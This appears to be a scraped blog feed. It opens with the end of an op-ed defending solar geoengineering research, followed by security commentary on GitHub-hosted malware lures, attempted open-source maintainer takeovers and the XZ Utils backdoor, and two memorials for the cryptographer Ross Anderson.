But burdensome regulation isn’t guaranteed to deter bad actors. If anything, they’ll just go work in the shadows. It is, however, a surefire way to discourage responsible researchers from engaging in the field. 

All those concerned about “meddling with the climate” should be in favor of open, public, science-informed strategies to talk more, not less, about geoengineering, and to foster transparent research across disciplines. And yes, this will include not just “harmless” modeling studies but also outdoor tests to understand the feasibility of such approaches and narrow down uncertainties. There’s really no way around that. 

In environmental sciences, tests involving dispersing substances are already performed for many other reasons, as long as they’re deemed safe by some reasonable standard. Similar experiments aimed at better understanding solar geoengineering should not be treated differently just because some people (but certainly not all of them) object on moral or environmental grounds. In fact, we should forcefully defend such experiments both because freedom of research is a worthy principle and because more information leads to better decision-making.

At the same time, scientists can’t ignore all the concerns and fears of the general public. We need to build more trust around solar geoengineering research and confidence in researchers. And we must encourage people to consider the issue from multiple perspectives and in relation to the rising risks of climate change.

This can be done, in part, through thoughtful scientific oversight efforts that aim to steer research toward beneficial outcomes by fostering transparency, international collaborations, and public engagement without imposing excessive burdens and blanket prohibitions.

Yes, this issue is complicated. Solar geoengineering may present risks and unknowns, and it raises profound, sometimes uncomfortable questions about humanity’s role in nature. 

But we also know for sure that we are the cause of climate change—and that it is exacerbating the dangers of heat waves, wildfires, flooding, famines, and storms that will inflict human suffering on staggering scales. If there are possible interventions that could limit that death and destruction, we have an obligation to evaluate them carefully, and to weigh any trade-offs with open and informed minds. 

Daniele Visioni is a climate scientist and assistant professor at Cornell University.

Using Legitimate GitHub URLs for Malware

22 April 2024 at 11:26

Interesting social-engineering attack vector:

McAfee released a report on a new LUA malware loader distributed through what appeared to be a legitimate Microsoft GitHub repository for the “C++ Library Manager for Windows, Linux, and MacOS,” known as vcpkg.

The attacker is exploiting a property of GitHub: comments to a particular repo can contain files, and those files will be associated with the project in the URL.

What this means is that someone can upload malware and “attach” it to a legitimate and trusted project.

As the file’s URL contains the name of the repository the comment was created in, and as almost every software company uses GitHub, this flaw can allow threat actors to develop extraordinarily crafty and trustworthy lures.

For example, a threat actor could upload a malware executable in NVIDIA’s driver installer repo that pretends to be a new driver fixing issues in a popular game. Or a threat actor could upload a file in a comment to the Google Chromium source code and pretend it’s a new test version of the web browser.

These URLs would also appear to belong to the company’s repositories, making them far more trustworthy.

Other Attempts to Take Over Open Source Projects

18 April 2024 at 07:06

After the XZ Utils discovery, people have been examining other open-source projects. Surprising no one, the incident is not unique:

The OpenJS Foundation Cross Project Council received a suspicious series of emails with similar messages, bearing different names and overlapping GitHub-associated emails. These emails implored OpenJS to take action to update one of its popular JavaScript projects to “address any critical vulnerabilities,” yet cited no specifics. The email author(s) wanted OpenJS to designate them as a new maintainer of the project despite having little prior involvement. This approach bears strong resemblance to the manner in which “Jia Tan” positioned themselves in the XZ/liblzma backdoor.

[…]

The OpenJS team also recognized a similar suspicious pattern in two other popular JavaScript projects not hosted by its Foundation, and immediately flagged the potential security concerns to respective OpenJS leaders, and the Cybersecurity and Infrastructure Security Agency (CISA) within the United States Department of Homeland Security (DHS).

The article includes a list of suspicious patterns, and another list of security best practices.

Backdoor in XZ Utils That Almost Happened

11 April 2024 at 07:01

Last week, the Internet dodged a major nation-state attack that would have had catastrophic cybersecurity repercussions worldwide. It’s a catastrophe that didn’t happen, so it won’t get much attention—but it should. There’s an important moral to the story of the attack and its discovery: The security of the global Internet depends on countless obscure pieces of software written and maintained by even more obscure unpaid, distractible, and sometimes vulnerable volunteers. It’s an untenable situation, and one that is being exploited by malicious actors. Yet precious little is being done to remedy it.

Programmers dislike doing extra work. If they can find already-written code that does what they want, they’re going to use it rather than recreate the functionality. These code repositories, called libraries, are hosted on sites like GitHub. There are libraries for everything: displaying objects in 3D, spell-checking, performing complex mathematics, managing an e-commerce shopping cart, moving files around the Internet—everything. Libraries are essential to modern programming; they’re the building blocks of complex software. The modularity they provide makes software projects tractable. Everything you use contains dozens of these libraries: some commercial, some open source and freely available. They are essential to the functionality of the finished software. And to its security.

You’ve likely never heard of an open-source library called XZ Utils, but it’s on hundreds of millions of computers. It’s probably on yours. It’s certainly in whatever corporate or organizational network you use. It’s a freely available library that does data compression. It’s important, in the same way that hundreds of other similar obscure libraries are important.

Many open-source libraries, like XZ Utils, are maintained by volunteers. In the case of XZ Utils, it’s one person, named Lasse Collin. He has been in charge of XZ Utils since he wrote it in 2009. And, at least in 2022, he’s had some “longterm mental health issues.” (To be clear, he is not to blame in this story. This is a systems problem.)

Beginning in at least 2021, Collin was personally targeted. We don’t know by whom, but we have account names: Jia Tan, Jigar Kumar, Dennis Ens. They’re not real names. They pressured Collin to transfer control over XZ Utils. In early 2023, they succeeded. Tan spent the year slowly incorporating a backdoor into XZ Utils: disabling systems that might discover his actions, laying the groundwork, and finally adding the complete backdoor earlier this year. On March 25, Hans Jansen—another fake name—tried to push the various Unix systems to upgrade to the new version of XZ Utils.

And everyone was poised to do so. It’s a routine update. In the span of a few weeks, it would have been part of both Debian and Red Hat Linux, which run on the vast majority of servers on the Internet. But on March 29, another unpaid volunteer, Andres Freund—a real person who works for Microsoft but who was doing this in his spare time—noticed something weird about how much processing the new version of XZ Utils was doing. It’s the sort of thing that could be easily overlooked, and even more easily ignored. But for whatever reason, Freund tracked down the weirdness and discovered the backdoor.

It’s a masterful piece of work. It affects the SSH remote login protocol, basically by adding a hidden piece of functionality that requires a specific key to enable. Someone with that key can use the backdoored SSH to upload and execute an arbitrary piece of code on the target machine. SSH runs as root, so that code could have done anything. Let your imagination run wild.

This isn’t something a hacker just whips up. This backdoor is the result of a years-long engineering effort. The ways the code evades detection in source form, how it lies dormant and undetectable until activated, and its immense power and flexibility give credence to the widely held assumption that a major nation-state is behind this.

If it hadn’t been discovered, it probably would have eventually ended up on every computer and server on the Internet. Though it’s unclear whether the backdoor would have affected Windows and macOS, it would have worked on Linux. Remember in 2020, when Russia planted a backdoor into SolarWinds that affected 14,000 networks? That seemed like a lot, but this would have been orders of magnitude more damaging. And again, the catastrophe was averted only because a volunteer stumbled on it. And it was possible in the first place only because the first unpaid volunteer, someone who turned out to be a national security single point of failure, was personally targeted and exploited by a foreign actor.

This is no way to run critical national infrastructure. And yet, here we are. This was an attack on our software supply chain. This attack subverted software dependencies. The SolarWinds attack targeted the update process. Other attacks target system design, development, and deployment. Such attacks are becoming increasingly common and effective, and also are increasingly the weapon of choice of nation-states.

It’s impossible to count how many of these single points of failure are in our computer systems. And there’s no way to know how many of the unpaid and unappreciated maintainers of critical software libraries are vulnerable to pressure. (Again, don’t blame them. Blame the industry that is happy to exploit their unpaid labor.) Or how many more have accidentally created exploitable vulnerabilities. How many other coercion attempts are ongoing? A dozen? A hundred? It seems impossible that the XZ Utils operation was a unique instance.

Solutions are hard. Banning open source won’t work; it’s precisely because XZ Utils is open source that an engineer discovered the problem in time. Banning software libraries won’t work, either; modern software can’t function without them. For years, security engineers have been pushing something called a “software bill of materials”: an ingredients list of sorts so that when one of these packages is compromised, network owners at least know if they’re vulnerable. The industry hates this idea and has been fighting it for years, but perhaps the tide is turning.

The fundamental problem is that tech companies dislike spending extra money even more than programmers dislike doing extra work. If there’s free software out there, they are going to use it—and they’re not going to do much in-house security testing. Easier software development equals lower costs equals more profits. The market economy rewards this sort of insecurity.

We need some sustainable ways to fund open-source projects that become de facto critical infrastructure. Public shaming can help here. The Open Source Security Foundation (OSSF), founded in 2022 after another critical vulnerability in an open-source library—Log4j—was discovered, addresses this problem. The big tech companies pledged $30 million in funding after the critical Log4j supply chain vulnerability, but they never delivered. And they are still happy to make use of all this free labor and free resources, as a recent Microsoft anecdote indicates. The companies benefiting from these freely available libraries need to actually step up, and the government can force them to.

There’s a lot of tech that could be applied to this problem, if corporations were willing to spend the money. Liabilities will help. The Cybersecurity and Infrastructure Security Agency’s (CISA’s) “secure by design” initiative will help, and CISA is finally partnering with OSSF on this problem. Certainly the security of these libraries needs to be part of any broad government cybersecurity initiative.

We got extraordinarily lucky this time, but maybe we can learn from the catastrophe that didn’t happen. Like the power grid, communications network, and transportation systems, the software supply chain is critical infrastructure, part of national security, and vulnerable to foreign attack. The US government needs to recognize this as a national security problem and start treating it as such.

This essay originally appeared in Lawfare.

In Memoriam: Ross Anderson, 1956–2024

10 April 2024 at 07:08

Last week, I posted a short memorial of Ross Anderson. The Communications of the ACM asked me to expand it. Here’s the longer version.

EDITED TO ADD (4/11): Two weeks before he passed away, Ross gave an 80-minute interview where he told his life story.

XZ Utils Backdoor

2 April 2024 at 14:50

The cybersecurity world got really lucky last week. An intentionally placed backdoor in XZ Utils, an open-source compression utility, was pretty much accidentally discovered by a Microsoft engineer—weeks before it would have been incorporated into both Debian and Red Hat Linux. From ArsTehnica:

Malicious code added to XZ Utils versions 5.6.0 and 5.6.1 modified the way the software functions. The backdoor manipulated sshd, the executable file used to make remote SSH connections. Anyone in possession of a predetermined encryption key could stash any code of their choice in an SSH login certificate, upload it, and execute it on the backdoored device. No one has actually seen code uploaded, so it’s not known what code the attacker planned to run. In theory, the code could allow for just about anything, including stealing encryption keys or installing malware.

It was an incredibly complex backdoor. Installing it was a multi-year process that seems to have involved social engineering the lone unpaid engineer in charge of the utility. More from ArsTechnica:

In 2021, someone with the username JiaT75 made their first known commit to an open source project. In retrospect, the change to the libarchive project is suspicious, because it replaced the safe_fprint function with a variant that has long been recognized as less secure. No one noticed at the time.

The following year, JiaT75 submitted a patch over the XZ Utils mailing list, and, almost immediately, a never-before-seen participant named Jigar Kumar joined the discussion and argued that Lasse Collin, the longtime maintainer of XZ Utils, hadn’t been updating the software often or fast enough. Kumar, with the support of Dennis Ens and several other people who had never had a presence on the list, pressured Collin to bring on an additional developer to maintain the project.

There’s a lot more. The sophistication of both the exploit and the process to get it into the software project scream nation-state operation. It’s reminiscent of Solar Winds, although (1) it would have been much, much worse, and (2) we got really, really lucky.

I simply don’t believe this was the only attempt to slip a backdoor into a critical piece of Internet software, either closed source or open source. Given how lucky we were to detect this one, I believe this kind of operation has been successful in the past. We simply have to stop building our critical national infrastructure on top of random software libraries managed by lone unpaid distracted—or worse—individuals.

Ross Anderson

31 March 2024 at 20:21

Ross Anderson unexpectedly passed away Thursday night in, I believe, his home in Cambridge.

I can’t remember when I first met Ross. Of course it was before 2008, when we created the Security and Human Behavior workshop. It was well before 2001, when we created the Workshop on Economics and Information Security. (Okay, he created both—I helped.) It was before 1998, when we wrote about the problems with key escrow systems. I was one of the people he brought to the Newton Institute, at Cambridge University, for the six-month cryptography residency program he ran (I mistakenly didn’t stay the whole time)—that was in 1996.

I know I was at the first Fast Software Encryption workshop in December 1993, another conference he created. There I presented the Blowfish encryption algorithm. Pulling an old first-edition of Applied Cryptography (the one with the blue cover) down from the shelf, I see his name in the acknowledgments. Which means that sometime in early 1993—probably at Eurocrypt in Lofthus, Norway—I, as an unpublished book author who had only written a couple of crypto articles for Dr. Dobb’s Journal, asked him to read and comment on my book manuscript. And he said yes. Which means I mailed him a paper copy. And he read it. And mailed his handwritten comments back to me. In an envelope with stamps. Because that’s how we did it back then.

I have known Ross for over thirty years, as both a colleague and a friend. He was enthusiastic, brilliant, opinionated, articulate, curmudgeonly, and kind. Pick up any of his academic papers—there are many—and odds are that you will find a least one unexpected insight. He was a cryptographer and security engineer, but also very much a generalist. He published on block cipher cryptanalysis in the 1990s, and the security of large-language models last year. He started conferences like nobody’s business. His masterwork book, Security Engineering—now in its third edition—is as comprehensive a tome on cybersecurity and related topics as you could imagine. (Also note his fifteen-lecture video series on that same page. If you have never heard Ross lecture, you’re in for a treat.) He was the first person to understand that security problems are often actually economic problems. He was the first person to make a lot of those sorts of connections. He fought against surveillance and backdoors, and for academic freedom. He didn’t suffer fools in either government or the corporate world.

He’s listed in the acknowledgments as a reader of every one of my books from Beyond Fear on. Recently, we’d see each other a couple of times a year: at this or that workshop or event. The last time I saw him was last June, at SHB 2023, in Pittsburgh. We were having dinner on Alessandro Acquisti‘s rooftop patio, celebrating another successful workshop. He was going to attend my Workshop on Reimagining Democracy in December, but he had to cancel at the last minute. (He sent me the talk he was going to give. I will see about posting it.) The day before he died, we were discussing how to accommodate everyone who registered for this year’s SHB workshop. I learned something from him every single time we talked. And I am not the only one.

My heart goes out to his wife Shireen and his family. We lost him much too soon.

EDITED TO ADD (4/10): I wrote a longer version for Communications of the ACM.

❌
❌